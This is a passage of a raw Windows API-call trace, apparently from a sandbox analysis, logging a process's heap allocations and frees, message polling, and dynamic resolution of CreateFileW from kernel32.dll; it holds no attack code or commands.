0x43cfa68 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.391] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0093.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0093.391] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0093.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0093.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0093.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0093.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23e0 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0093.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca160 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0093.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0093.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0093.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0093.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0093.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0093.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0093.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0093.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0093.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0093.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0093.395] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0093.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0093.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0093.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0093.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0093.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0093.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0093.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.399] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.402] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0093.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0093.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca9d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0093.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.403] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0093.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 